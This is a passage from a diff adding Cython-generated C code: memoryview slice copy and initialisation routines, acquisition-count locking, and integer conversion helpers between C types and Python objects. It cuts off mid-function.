(unlikely(from_mvs->suboffsets[i] >= 0)) { + PyErr_Format(PyExc_ValueError, "Cannot copy memoryview slice with " + "indirect dimensions (axis %d)", i); + goto fail; + } + } + shape_tuple = PyTuple_New(ndim); + if (unlikely(!shape_tuple)) { + goto fail; + } + __Pyx_GOTREF(shape_tuple); + for(i = 0; i < ndim; i++) { + temp_int = PyInt_FromSsize_t(from_mvs->shape[i]); + if(unlikely(!temp_int)) { + goto fail; + } else { + PyTuple_SET_ITEM(shape_tuple, i, temp_int); + temp_int = NULL; + } + } + array_obj = __pyx_array_new(shape_tuple, sizeof_dtype, buf->format, (char *) mode, NULL); + if (unlikely(!array_obj)) { + goto fail; + } + __Pyx_GOTREF(array_obj); + memview_obj = (struct __pyx_memoryview_obj *) __pyx_memoryview_new( + (PyObject *) array_obj, contig_flag, + dtype_is_object, + from_mvs->memview->typeinfo); + if (unlikely(!memview_obj)) + goto fail; + if (unlikely(__Pyx_init_memviewslice(memview_obj, ndim, &new_mvs, 1) < 0)) + goto fail; + if (unlikely(__pyx_memoryview_copy_contents(*from_mvs, new_mvs, ndim, ndim, + dtype_is_object) < 0)) + goto fail; + goto no_fail; +fail: + __Pyx_XDECREF(new_mvs.memview); + new_mvs.memview = NULL; + new_mvs.data = NULL; +no_fail: + __Pyx_XDECREF(shape_tuple); + __Pyx_XDECREF(temp_int); + __Pyx_XDECREF(array_obj); + __Pyx_RefNannyFinishContext(); + return new_mvs; +} + +/* MemviewSliceInit */ + static int +__Pyx_init_memviewslice(struct __pyx_memoryview_obj *memview, + int ndim, + __Pyx_memviewslice *memviewslice, + int memview_is_new_reference) +{ + __Pyx_RefNannyDeclarations + int i, retval=-1; + Py_buffer *buf = &memview->view; + __Pyx_RefNannySetupContext("init_memviewslice", 0); + if (unlikely(memviewslice->memview || memviewslice->data)) { + PyErr_SetString(PyExc_ValueError, + "memviewslice is already initialized!"); + goto fail; + } + if (buf->strides) { + for (i = 0; i < ndim; i++) { + memviewslice->strides[i] = buf->strides[i]; + } + } else { + Py_ssize_t stride = buf->itemsize; + for (i = ndim - 1; i >= 0; i--) { + memviewslice->strides[i] = stride; + stride *= buf->shape[i]; + } + } + for (i = 0; i < ndim; i++) { + memviewslice->shape[i] = buf->shape[i]; + if (buf->suboffsets) { + memviewslice->suboffsets[i] = buf->suboffsets[i]; + } else { + memviewslice->suboffsets[i] = -1; + } + } + memviewslice->memview = memview; + memviewslice->data = (char *)buf->buf; + if (__pyx_add_acquisition_count(memview) == 0 && !memview_is_new_reference) { + Py_INCREF(memview); + } + retval = 0; + goto no_fail; +fail: + memviewslice->memview = 0; + memviewslice->data = 0; + retval = -1; +no_fail: + __Pyx_RefNannyFinishContext(); + return retval; +} +#ifndef Py_NO_RETURN +#define Py_NO_RETURN +#endif +static void __pyx_fatalerror(const char *fmt, ...) Py_NO_RETURN { + va_list vargs; + char msg[200]; +#if PY_VERSION_HEX >= 0x030A0000 || defined(HAVE_STDARG_PROTOTYPES) + va_start(vargs, fmt); +#else + va_start(vargs); +#endif + vsnprintf(msg, 200, fmt, vargs); + va_end(vargs); + Py_FatalError(msg); +} +static CYTHON_INLINE int +__pyx_add_acquisition_count_locked(__pyx_atomic_int_type *acquisition_count, + PyThread_type_lock lock) +{ + int result; + PyThread_acquire_lock(lock, 1); + result = (*acquisition_count)++; + PyThread_release_lock(lock); + return result; +} +static CYTHON_INLINE int +__pyx_sub_acquisition_count_locked(__pyx_atomic_int_type *acquisition_count, + PyThread_type_lock lock) +{ + int result; + PyThread_acquire_lock(lock, 1); + result = (*acquisition_count)--; + PyThread_release_lock(lock); + return result; +} +static CYTHON_INLINE void +__Pyx_INC_MEMVIEW(__Pyx_memviewslice *memslice, int have_gil, int lineno) +{ + __pyx_nonatomic_int_type old_acquisition_count; + struct __pyx_memoryview_obj *memview = memslice->memview; + if (unlikely(!memview || (PyObject *) memview == Py_None)) { + return; + } + old_acquisition_count = __pyx_add_acquisition_count(memview); + if (unlikely(old_acquisition_count <= 0)) { + if (likely(old_acquisition_count == 0)) { + if (have_gil) { + Py_INCREF((PyObject *) memview); + } else { + PyGILState_STATE _gilstate = PyGILState_Ensure(); + Py_INCREF((PyObject *) memview); + PyGILState_Release(_gilstate); + } + } else { + __pyx_fatalerror("Acquisition count is %d (line %d)", + old_acquisition_count+1, lineno); + } + } +} +static CYTHON_INLINE void __Pyx_XCLEAR_MEMVIEW(__Pyx_memviewslice *memslice, + int have_gil, int lineno) { + __pyx_nonatomic_int_type old_acquisition_count; + struct __pyx_memoryview_obj *memview = memslice->memview; + if (unlikely(!memview || (PyObject *) memview == Py_None)) { + memslice->memview = NULL; + return; + } + old_acquisition_count = __pyx_sub_acquisition_count(memview); + memslice->data = NULL; + if (likely(old_acquisition_count > 1)) { + memslice->memview = NULL; + } else if (likely(old_acquisition_count == 1)) { + if (have_gil) { + Py_CLEAR(memslice->memview); + } else { + PyGILState_STATE _gilstate = PyGILState_Ensure(); + Py_CLEAR(memslice->memview); + PyGILState_Release(_gilstate); + } + } else { + __pyx_fatalerror("Acquisition count is %d (line %d)", + old_acquisition_count-1, lineno); + } +} + +/* TypeInfoToFormat */ + static struct __pyx_typeinfo_string __Pyx_TypeInfoToFormat(__Pyx_TypeInfo *type) { + struct __pyx_typeinfo_string result = { {0} }; + char *buf = (char *) result.string; + size_t size = type->size; + switch (type->typegroup) { + case 'H': + *buf = 'c'; + break; + case 'I': + case 'U': + if (size == 1) + *buf = (type->is_unsigned) ? 'B' : 'b'; + else if (size == 2) + *buf = (type->is_unsigned) ? 'H' : 'h'; + else if (size == 4) + *buf = (type->is_unsigned) ? 'I' : 'i'; + else if (size == 8) + *buf = (type->is_unsigned) ? 'Q' : 'q'; + break; + case 'P': + *buf = 'P'; + break; + case 'C': + { + __Pyx_TypeInfo complex_type = *type; + complex_type.typegroup = 'R'; + complex_type.size /= 2; + *buf++ = 'Z'; + *buf = __Pyx_TypeInfoToFormat(&complex_type).string[0]; + break; + } + case 'R': + if (size == 4) + *buf = 'f'; + else if (size == 8) + *buf = 'd'; + else + *buf = 'g'; + break; + } + return result; +} + +/* CIntFromPy */ + static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(int) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(int) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(int) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(int), + little, !is_unsigned); + } +} + +/* CIntFromPy */ + static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if 